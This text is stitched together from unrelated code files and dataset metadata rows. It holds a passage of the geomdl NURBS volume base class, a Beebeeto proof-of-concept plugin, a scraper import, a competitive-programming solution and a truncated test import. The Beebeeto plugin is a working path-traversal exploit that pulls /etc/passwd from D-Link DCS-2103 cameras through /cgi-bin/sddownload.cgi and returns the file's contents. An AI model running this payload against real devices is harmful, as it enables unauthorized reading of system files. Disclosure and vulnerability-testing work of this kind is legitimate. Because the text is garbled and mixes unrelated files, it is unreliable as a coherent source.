""" Evaluates the derivatives of the parametric surface at parameter (u, v).
.. note::
This is an abstract method and it must be implemented in the subclass.
:param u: parameter on the u-direction
:type u: float
:param v: parameter on the v-direction
:type v: float
:param order: derivative order
:type order: int
"""
# Check all variables are set before the evaluation
self._check_variables()
# Check parameters
if self._kv_normalize:
if not utilities.check_params([u, v]):
raise GeomdlException("Parameters should be between 0 and 1")
@six.add_metaclass(abc.ABCMeta)
class Volume(SplineGeometry):
""" Abstract base class for defining spline volumes.
Volume ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to
differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using
``six`` to set metaclass allows users to use the abstract classes in a correct way.
The abstract base classes in this module are implemented using a feature called Python Properties. This feature
allows users to use some of the functions as if they are class fields. You can also consider properties as a
pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of
these properties.
The Volume ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func``
keyword as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the
FindSpan function in the ``helpers`` module.
You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details.
Code segment below illustrates a possible implementation of Volume abstract base class:
.. code-block:: python
:linenos:
from geomdl import abstract
class MyVolumeClass(abstract.Volume):
def __init__(self, **kwargs):
super(MyVolumeClass, self).__init__(**kwargs)
# Add your constructor code here
def evaluate(self, **kwargs):
# Implement this function
pass
def evaluate_single(self, uvw):
# Implement this function
pass
def evaluate_list(self, uvw_list):
# Implement this function
pass
The properties and functions defined in the abstract base class will be automatically available in the subclasses.
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
* ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True*
* ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear`
"""
def __init__(self, **kwargs):
self._pdim = 3 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions
self._dinit = 0.1 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value
self._array_type = list if not hasattr(self, '_array_type') else self._array_type
super(Volume, self).__init__(**kwargs)
self._name = "Volume" # descriptor field
@property
def order_u(self):
""" Order for the u-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
        :getter: Gets the order for the u-direction
        :setter: Sets the order for the u-direction
:type: int
"""
return self.degree_u + 1
@order_u.setter
def order_u(self, value):
self.degree_u = value - 1
@property
def order_v(self):
""" Order for the v-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
        :getter: Gets the order for the v-direction
        :setter: Sets the order for the v-direction
:type: int
"""
return self.degree_v + 1
@order_v.setter
def order_v(self, value):
self.degree_v = value - 1
@property
def order_w(self):
""" Order for the w-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
        :getter: Gets the order for the w-direction
        :setter: Sets the order for the w-direction
:type: int
"""
return self.degree_w + 1
@order_w.setter
def order_w(self, value):
self.degree_w = value - 1
@property
def degree(self):
""" Degree for u-, v- and w-directions
:getter: Gets the degree
:setter: Sets the degree
:type: list
"""
return self._degree
@degree.setter
def degree(self, value):
if not isinstance(value, (list, tuple)):
raise ValueError("Please input a list with a length of " + str(self.pdimension))
self.degree_u = value[0]
self.degree_v = value[1]
self.degree_w = value[2]
@property
def degree_u(self):
""" Degree for the u-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the u-direction
:setter: Sets degree for the u-direction
:type: int
"""
return self._degree[0]
@degree_u.setter
def degree_u(self, value):
        val = int(value)
        if val <= 0:
            raise ValueError("Degree must be greater than zero")
        # Clean up the evaluated points
        self.reset(evalpts=True)
        # Set degree u
        self._degree[0] = val
@property
def degree_v(self):
""" Degree for the v-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the v-direction
:setter: Sets degree for the v-direction
:type: int
"""
return self._degree[1]
@degree_v.setter
def degree_v(self, value):
        val = int(value)
        if val <= 0:
            raise ValueError("Degree must be greater than zero")
        # Clean up the evaluated points
        self.reset(evalpts=True)
        # Set degree v
        self._degree[1] = val
@property
def degree_w(self):
""" Degree for the w-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the w-direction
:setter: Sets degree for the w-direction
:type: int
"""
return self._degree[2]
@degree_w.setter
def degree_w(self, value):
        val = int(value)
        if val <= 0:
            raise ValueError("Degree must be greater than zero")
        # Clean up the evaluated points
        self.reset(evalpts=True)
        # Set degree w
        self._degree[2] = val
@property
def knotvector(self):
""" Knot vector for u-, v- and w-directions
:getter: Gets the knot vector
:setter: Sets the knot vector
:type: list
"""
return self._knot_vector
@knotvector.setter
def knotvector(self, value):
if not isinstance(value, (list, tuple)):
raise ValueError("Please input a list with a length of " + str(self.pdimension))
self.knotvector_u = value[0]
self.knotvector_v = value[1]
self.knotvector_w = value[2]
@property
def knotvector_u(self):
""" Knot vector for the u-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the u-direction
:setter: Sets knot vector for the u-direction
:type: list
"""
return self._knot_vector[0]
@knotvector_u.setter
def knotvector_u(self, value):
if self.degree_u == 0 or self.ctrlpts_size_u == 0:
raise ValueError("Set degree and control points first on the u-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_u, value, self.ctrlpts_size_u):
raise ValueError("Input is not a valid knot vector on the u-direction")
        # Clean up the evaluated points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def knotvector_v(self):
""" Knot vector for the v-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the v-direction
:setter: Sets knot vector for the v-direction
:type: list
"""
return self._knot_vector[1]
@knotvector_v.setter
def knotvector_v(self, value):
if self.degree_v == 0 or self.ctrlpts_size_v == 0:
raise ValueError("Set degree and control points first on the v-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_v, value, self.ctrlpts_size_v):
raise ValueError("Input is not a valid knot vector on the v-direction")
        # Clean up the evaluated points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[1] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def knotvector_w(self):
""" Knot vector for the w-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the w-direction
:setter: Sets knot vector for the w-direction
:type: list
"""
return self._knot_vector[2]
@knotvector_w.setter
def knotvector_w(self, value):
if self.degree_w == 0 or self.ctrlpts_size_w == 0:
raise ValueError("Set degree and control points first for the w-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_w, value, self.ctrlpts_size_w):
raise ValueError("Input is not a valid knot vector for the w-direction")
        # Clean up the evaluated points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[2] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def ctrlpts(self):
""" 1-dimensional array of control points.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the control points
:setter: Sets the control points
:type: list
"""
return self._control_points
@ctrlpts.setter
def ctrlpts(self, value):
if self.ctrlpts_size_u <= 0 or self.ctrlpts_size_v <= 0 or self.ctrlpts_size_w <= 0:
raise ValueError("Please set the number of control points on the u-, v- and w-directions")
self.set_ctrlpts(value, self.ctrlpts_size_u, self.ctrlpts_size_v, self.ctrlpts_size_w)
@property
def ctrlpts_size_u(self):
""" Number of control points for the u-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points for the u-direction
:setter: Sets number of control points for the u-direction
"""
return self._control_points_size[0]
@ctrlpts_size_u.setter
def ctrlpts_size_u(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points for the u-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[0] = value
@property
def ctrlpts_size_v(self):
""" Number of control points for the v-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points for the v-direction
:setter: Sets number of control points for the v-direction
"""
return self._control_points_size[1]
@ctrlpts_size_v.setter
def ctrlpts_size_v(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points for the v-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[1] = value
@property
def ctrlpts_size_w(self):
""" Number of control points for the w-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points for the w-direction
:setter: Sets number of control points for the w-direction
"""
return self._control_points_size[2]
@ctrlpts_size_w.setter
def ctrlpts_size_w(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points for the w-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[2] = value
@property
def sample_size_u(self):
""" Sample size for the u-direction.
Sample size defines the number of evaluated points to generate. It also sets the ``delta_u`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the u-direction
:setter: Sets sample size for the u-direction
:type: int
"""
return int(1.0 / self.delta_u) + 1
@sample_size_u.setter
def sample_size_u(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0:
warnings.warn("Cannot determine 'delta_u' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_u = self.knotvector_u[self.degree_u]
stop_u = self.knotvector_u[-(self.degree_u + 1)]
# Set delta values
self.delta_u = (stop_u - start_u) / float(value - 1)
@property
def sample_size_v(self):
""" Sample size for the v-direction.
Sample size defines the number of evaluated points to generate. It also sets the ``delta_v`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the v-direction
:setter: Sets sample size for the v-direction
:type: int
"""
return int(1.0 / self.delta_v) + 1
@sample_size_v.setter
def sample_size_v(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_v is None or len(self.knotvector_v) == 0) or self.degree_v == 0:
warnings.warn("Cannot determine 'delta_v' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_v = self.knotvector_v[self.degree_v]
stop_v = self.knotvector_v[-(self.degree_v + 1)]
# Set delta values
self.delta_v = (stop_v - start_v) / float(value - 1)
@property
def sample_size_w(self):
""" Sample size for the w-direction.
Sample size defines the number of evaluated points to generate. It also sets the ``delta_w`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the w-direction
:setter: Sets sample size for the w-direction
:type: int
"""
return int(1.0 / self.delta_w) + 1
@sample_size_w.setter
def sample_size_w(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_w is None or len(self.knotvector_w) == 0) or self.degree_w == 0:
warnings.warn("Cannot determine 'delta_w' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_w = self.knotvector_w[self.degree_w]
stop_w = self.knotvector_w[-(self.degree_w + 1)]
# Set delta values
self.delta_w = (stop_w - start_w) / float(value - 1)
@property
def sample_size(self):
""" Sample size for both u- and v-directions.
Sample size defines the number of surface points to generate. It also sets the ``delta`` property.
The following figure illustrates the working principles of sample size property:
.. math::
\\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}}
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size as a tuple of values corresponding to u-, v- and w-directions
        :setter: Sets sample size for u-, v- and w-directions
:type: int
"""
sample_size_u = int(1.0 / self.delta_u) + 1
sample_size_v = int(1.0 / self.delta_v) + 1
sample_size_w = int(1.0 / self.delta_w) + 1
return sample_size_u, sample_size_v, sample_size_w
@sample_size.setter
def sample_size(self, value):
if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0 or \
(self.knotvector_v is None or len(self.knotvector_v) == 0 or self.degree_v == 0) or \
(self.knotvector_w is None or len(self.knotvector_w) == 0 or self.degree_w == 0):
warnings.warn("Cannot determine 'delta' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_u = self.knotvector_u[self.degree_u]
stop_u = self.knotvector_u[-(self.degree_u + 1)]
start_v = self.knotvector_v[self.degree_v]
stop_v = self.knotvector_v[-(self.degree_v + 1)]
start_w = self.knotvector_w[self.degree_w]
stop_w = self.knotvector_w[-(self.degree_w + 1)]
# Set delta values
self.delta_u = (stop_u - start_u) / float(value - 1)
self.delta_v = (stop_v - start_v) / float(value - 1)
self.delta_w = (stop_w - start_w) / float(value - 1)
@property
def delta_u(self):
""" Evaluation delta for the u-direction.
        Evaluation delta corresponds to the *step size* while the ``evaluate()`` function iterates on the knot vector
        to generate evaluated points. Decreasing the step size results in generation of more evaluated points.
        Therefore, the smaller the delta value, the smoother the evaluated volume.
Please note that ``delta_u`` and ``sample_size_u`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_u`` will also set ``sample_size_u``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the u-direction
:setter: Sets evaluation delta for the u-direction
:type: float
"""
return self._delta[0]
@delta_u.setter
def delta_u(self, value):
# Delta value should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Evaluation delta (u-direction) must be between 0.0 and 1.0")
# Clean up evaluated points
self.reset(evalpts=True)
# Set new delta value
self._delta[0] = float(value)
@property
def delta_v(self):
""" Evaluation delta for the v-direction.
        Evaluation delta corresponds to the *step size* while the ``evaluate()`` function iterates on the knot vector
        to generate evaluated points. Decreasing the step size results in generation of more evaluated points.
        Therefore, the smaller the delta value, the smoother the evaluated volume.
Please note that ``delta_v`` and ``sample_size_v`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_v`` will also set ``sample_size_v``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the v-direction
:setter: Sets evaluation delta for the v-direction
:type: float
"""
return self._delta[1]
@delta_v.setter
def delta_v(self, value):
# Delta value should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Evaluation delta (v-direction) should be between 0.0 and 1.0")
# Clean up evaluated points
self.reset(evalpts=True)
# Set new delta value
self._delta[1] = float(value)
@property
def delta_w(self):
""" Evaluation delta for the w-direction.
        Evaluation delta corresponds to the *step size* while the ``evaluate()`` function iterates on the knot vector
        to generate evaluated points. Decreasing the step size results in generation of more evaluated points.
        Therefore, the smaller the delta value, the smoother the evaluated volume.
Please note that ``delta_w`` and ``sample_size_w`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_w`` will also set ``sample_size_w``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the w-direction
:setter: Sets evaluation delta for the w-direction
:type: float
"""
return self._delta[2]
@delta_w.setter
def delta_w(self, value):
# Delta value should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Evaluation delta (w-direction) should be between 0.0 and 1.0")
# Clean up evaluated points
self.reset(evalpts=True)
# Set new delta value
self._delta[2] = float(value)
@property
def delta(self):
""" Evaluation delta for u-, v- and w-directions.
        Evaluation delta corresponds to the *step size* while the ``evaluate()`` function iterates on the knot vector
        to generate evaluated points. Decreasing the step size results in generation of more evaluated points.
        Therefore, the smaller the delta value, the smoother the evaluated volume.
Please note that ``delta`` and ``sample_size`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta`` will also set ``sample_size``.
The following figure illustrates the working principles of the delta property:
.. math::
            \\left[{{u_{start}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right]
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta as a tuple of values corresponding to u-, v- and w-directions
:setter: Sets evaluation delta for u-, v- and w-directions
:type: float
"""
return self.delta_u, self.delta_v, self.delta_w
@delta.setter
def delta(self, value):
if isinstance(value, (int, float)):
self.delta_u = value
self.delta_v = value
self.delta_w = value
elif isinstance(value, (list, tuple)):
if len(value) == 3:
self.delta_u = value[0]
self.delta_v = value[1]
self.delta_w = value[2]
else:
raise ValueError("Surface requires 3 delta values")
else:
raise ValueError("Cannot set delta. Please input a numeric value or a list or tuple with 3 numeric values")
@property
def data(self):
""" Returns a dictionary containing all shape data.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
"""
return dict(
rational=self.rational,
dimension=self.dimension,
degree=self._degree,
knotvector=self._knot_vector,
size=self._control_points_size,
control_points=self._control_points
)
def reset(self, **kwargs):
""" Resets control points and/or evaluated points.
Keyword Arguments:
* ``evalpts``: if True, then resets evaluated points
        * ``ctrlpts``: if True, then resets control points
"""
reset_ctrlpts = kwargs.get('ctrlpts', False)
reset_evalpts = kwargs.get('evalpts', False)
if reset_ctrlpts:
self._control_points = self._init_array()
self._control_points_size = [0, 0, 0]
self._bounding_box = self._init_array()
if reset_evalpts:
self._eval_points = self._init_array()
def _check_variables(self):
""" Checks whether the evaluation is possible or not. """
works = True
param_list = []
if self.degree_u == 0:
works = False
param_list.append('degree_u')
if self.degree_v == 0:
works = False
param_list.append('degree_v')
if self.degree_w == 0:
works = False
param_list.append('degree_w')
if self._control_points is None or len(self._control_points) == 0:
works = False
param_list.append('ctrlpts')
if self.knotvector_u is None or len(self.knotvector_u) == 0:
works = False
param_list.append('knotvector_u')
if self.knotvector_v is None or len(self.knotvector_v) == 0:
works = False
param_list.append('knotvector_v')
if self.knotvector_w is None or len(self.knotvector_w) == 0:
works = False
param_list.append('knotvector_w')
if not works:
raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list))
def set_ctrlpts(self, ctrlpts, *args, **kwargs):
""" Sets the control points and checks if the data is consistent.
This method is designed to provide a consistent way to set control points whether they are weighted or not.
It directly sets the control points member of the class, and therefore it doesn't return any values.
The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates
will be an array of 3 elements representing *(x, y, z)* coordinates.
:param ctrlpts: input control points as a list of coordinates
:type ctrlpts: list
:param args: number of control points corresponding to each parametric dimension
:type args: tuple[int, int, int]
"""
# Validate input
for arg, degree in zip(args, self._degree):
if degree <= 0:
raise ValueError("Set the degree first")
if arg < degree + 1:
raise ValueError("Number of control points should be at least degree + 1")
        # Clean up the evaluated points and the control points
self.reset(evalpts=True, ctrlpts=True)
# Call parent function
super(Volume, self).set_ctrlpts(ctrlpts, *args, **kwargs)
def render(self, **kwargs):
""" Renders the volume using the visualization component.
The visualization component must be set using :py:attr:`~vis` property before calling this method.
Keyword Arguments:
* ``cpcolor``: sets the color of the control points
* ``evalcolor``: sets the color of the volume
* ``filename``: saves the plot with the input name
* ``plot``: controls plot window visibility. *Default: True*
* ``animate``: activates animation (if supported). *Default: False*
* ``grid_size``: grid size for voxelization. *Default: (16, 16, 16)*
* ``use_mp``: flag to activate multi-threaded voxelization. *Default: False*
        * ``num_procs``: number of concurrent processes for multi-threaded voxelization. *Default: 4*
        * ``extras``: adds line plots to the figure. *Default: None*
The ``plot`` argument is useful when you would like to work on the command line without any window context.
If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables
plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the
configuration class.
``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts
in the format described below:
.. code-block:: python
:linenos:
[
dict( # line plot 1
points=[[1, 2, 3], [4, 5, 6]], # list of points
name="My line Plot 1", # name displayed on the legend
color="red", # color of the line plot
size=6.5 # size of the line plot
),
dict( # line plot 2
points=[[7, 8, 9], [10, 11, 12]], # list of points
name="My line Plot 2", # name displayed on the legend
color="navy", # color of the line plot
size=12.5 # size of the line plot
)
]
"""
if not self._vis_component:
warnings.warn("No visualization component has been set")
return
cpcolor = kwargs.get('cpcolor', 'blue')
evalcolor = kwargs.get('evalcolor', 'green')
bboxcolor = kwargs.get('bboxcolor', 'darkorange')
filename = kwargs.get('filename', None)
plot_visible = kwargs.get('plot', True)
extra_plots = kwargs.get('extras', None)
animate_plot = kwargs.get('animate', False)
# Check all parameters are set
self._check_variables()
# Check if the volume has been evaluated
if self._eval_points is None or len(self._eval_points) == 0:
self.evaluate()
# Clear the visualization component
self._vis_component.clear()
# Add control points
if self._vis_component.mconf['ctrlpts'] == 'points':
self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Add evaluated points
if self._vis_component.mconf['evalpts'] == 'points':
self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts')
# Add evaluated points as voxels
if self._vis_component.mconf['evalpts'] == 'voxels':
grid, filled = voxelize.voxelize(self, **kwargs)
polygrid = voxelize.convert_bb_to_faces(grid)
self._vis_component.add(ptsarr=[polygrid, filled], name=self.name, color=evalcolor, plot_type='evalpts')
# Bounding box
self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox')
# User-defined plots
if extra_plots is not None:
for ep in extra_plots:
self._vis_component.add(ptsarr=ep['points'], name=ep['name'],
color=(ep['color'], ep['size']), plot_type='extras')
# Data requested by the visualization module
if self._vis_component.mconf['others']:
vis_other = self._vis_component.mconf['others'].split(",")
for vo in vis_other:
vo_clean = vo.strip()
# Send center point of the parametric space to the visualization module
if vo_clean == "midpt":
midprm_u = (max(self.knotvector_u) + min(self.knotvector_u)) / 2.0
midprm_v = (max(self.knotvector_v) + min(self.knotvector_v)) / 2.0
midprm_w = (max(self.knotvector_w) + min(self.knotvector_w)) / 2.0
midpt = self.evaluate_single((midprm_u, midprm_v, midprm_w))
self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean)
# Display the figure
if animate_plot:
self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible)
else:
self._vis_component.render(fig_save_as=filename, display_plot=plot_visible)
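    # Voxel rendering sketch (``grid_size`` and ``use_mp`` are forwarded to the
    # ``voxelize`` helper via **kwargs above; a voxel-capable visualization
    # component is assumed to be set on the instance beforehand):
    #   vol.render(grid_size=(8, 8, 8), use_mp=True, num_procs=4)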
@abc.abstractmethod
def evaluate(self, **kwargs):
""" Evaluates the parametric volume.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
# Check all parameters are set before the evaluation
self._check_variables()
@abc.abstractmethod
def evaluate_single(self, param):
""" Evaluates the parametric surface at the given (u, v, w) parameter.
.. note::
This is an abstract method and it must be implemented in the subclass.
        :param param: parameter (u, v, w)
"""
# Check all parameters are set before the evaluation
self._check_variables()
if isinstance(param, (int, float)):
param = [float(param) for _ in range(self.pdimension)]
# Check parameters
if self._kv_normalize:
if not utilities.check_params(param):
raise GeomdlException("Parameters should be between 0 and 1")
@abc.abstractmethod
def evaluate_list(self, param_list):
""" Evaluates the parametric volume for an input range of (u, v, w) parameter pairs.
.. note::
This is an abstract method and it must be implemented in the subclass.
        :param param_list: array of parameters (u, v, w)
"""
# Check all parameters are set before the evaluation
self._check_variables()
| [
"[email protected]"
] | |
720fea823a41bf05eb6a14e1f940971f38e10095 | e77a3618d0afe63a2f00d87b61c3f19d3eba10d8 | /plugins/beebeeto/poc_2014_0149.py | ff203f0727674fb7a8ebff1da4a637af1da4eb49 | [] | no_license | Explorer1092/coco | b54e88a527b29209de7c636833ac5d102514291b | 15c5aba0972ac68dc4c874ddacf5986af5ac2a64 | refs/heads/master | 2020-05-31T07:03:19.277209 | 2019-01-29T14:36:45 | 2019-01-29T14:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,184 | py | #!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import urllib2
from baseframe import BaseFrame
class MyPoc(BaseFrame):
poc_info = {
        # PoC information
'poc': {
'id': 'poc-2014-0149',
            'name': 'D-Link DCS-2103 /cgi-bin/sddownload.cgi Arbitrary File Download Vulnerability Exploit',
'author': 'foundu',
'create_date': '2014-11-19',
},
        # Protocol information
'protocol': {
'name': 'http',
'port': [80],
'layer4_protocol': ['tcp'],
},
        # Vulnerability information
'vul': {
'app_name': 'D-Link',
'vul_version': 'DCS-2103',
'type': 'Arbitrary File Download',
            'tag': ['D-Link vulnerability', 'arbitrary file download vulnerability', '/cgi-bin/sddownload.cgi', 'cgi'],
'desc': '''
Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model
with other firmware versions also must be vulnerable.
I found these vulnerabilities at 11.07.2014 and later informed D-Link. But
they haven't answered. It looks like they are busy with fixing
vulnerabilities in DAP-1360, which I wrote about earlier.
''',
'references': ['http://www.intelligentexploit.com/view-details.html?id=20197',
]
},
}
@classmethod
def exploit(cls, args):
payload = '/cgi-bin/sddownload.cgi?file=/../../etc/passwd'
verify_url = args['options']['target'] + payload
req = urllib2.Request(verify_url)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
content = urllib2.urlopen(req).read()
if 'root:' in content and 'nobody:' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['passwd'] = content
return args
verify = exploit
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run()) | [
"[email protected]"
] | |
eead8a129c8bd1f58b1499653bdbfad5e2d62157 | 526bf18a8695862067c817f432ab197ceb645f39 | /scrappers/cars/getautofinance/hwy11ram/__init__.py | c8fffab15b7e28ff8f73e39f28b1f956fcff4a4e | [] | no_license | sintimaski/bfs-be | a7fd623911a2220face49a0ef84574f3fd7a09a8 | 964a9c7e9cc876aaf8b0723d6b3f26bd378c3721 | refs/heads/master | 2023-08-02T09:00:44.855055 | 2021-09-22T13:07:01 | 2021-09-22T13:07:01 | 339,531,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | from .hwy11ram import Hwy11RamScrapper
| [
"[email protected]"
] | |
21c0cebb2546807a8dd223104a08e5e29d58ec7c | 62766deea531d0b89b86a53e6f51b94fd2a88f23 | /AtCoder/ABC/131/c.py | fbe2beb18aab0fad58d1c7599493260ae7b68225 | [
"MIT"
] | permissive | ttyskg/ProgrammingCompetition | 53620b07317ae5cbd1ee06272e573e3682ac15f3 | 885c5a1be228ae7ba9f00b3d63521c9ff7d21608 | refs/heads/master | 2023-08-18T08:38:33.068168 | 2023-08-15T04:28:13 | 2023-08-15T04:28:13 | 183,425,786 | 0 | 0 | MIT | 2023-08-15T04:28:14 | 2019-04-25T12:02:53 | Python | UTF-8 | Python | false | false | 476 | py | import sys
def gcd(a, b):
"""Euclidean Algorithm"""
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return (a * b) // gcd(a, b)
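# Quick sanity examples for the helpers above:
#   gcd(12, 18) == 6 and lcm(4, 6) == 12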
def main():
input = sys.stdin.readline
A, B, C, D = map(int, input().split())
E = lcm(C, D)
total = B - (A-1)
mul_c = B // C - (A-1) // C
mul_d = B // D - (A-1) // D
mul_e = B // E - (A-1) // E
return total - (mul_c + mul_d - mul_e)
if __name__ == '__main__':
print(main())
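# Worked example of the inclusion-exclusion in main(), for hypothetical
# stdin "4 9 2 3" (A=4, B=9, C=2, D=3):
#   total numbers in [4, 9]        -> 6
#   multiples of 2                 -> 3   (4, 6, 8)
#   multiples of 3                 -> 2   (6, 9)
#   multiples of lcm(2, 3) = 6     -> 1   (6)
#   answer = 6 - (3 + 2 - 1) = 2   (5 and 7 are divisible by neither)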
| [
"[email protected]"
] | |
889b22757513884a8c6c50f0b76bbe2c55a22845 | b515ebbe9b259cf8cc11bae3eb2cd9094d9dac80 | /tests/integration/test_base.py | 09c270270007ae701dc6d64c0735eb0fe39714a5 | [
"MIT",
"Python-2.0"
] | permissive | cambiumproject/python-quickbooks | a234e29555e37399f53a9909cf4c3cf61e9e7bc1 | 06110a4a88bb47b2e6349a193908c083d506dde1 | refs/heads/master | 2023-08-07T20:15:14.600671 | 2021-07-20T21:53:59 | 2021-07-20T21:53:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,335 | py | import os
from unittest import TestCase
from intuitlib.client import AuthClient
from quickbooks.client import QuickBooks, Environments
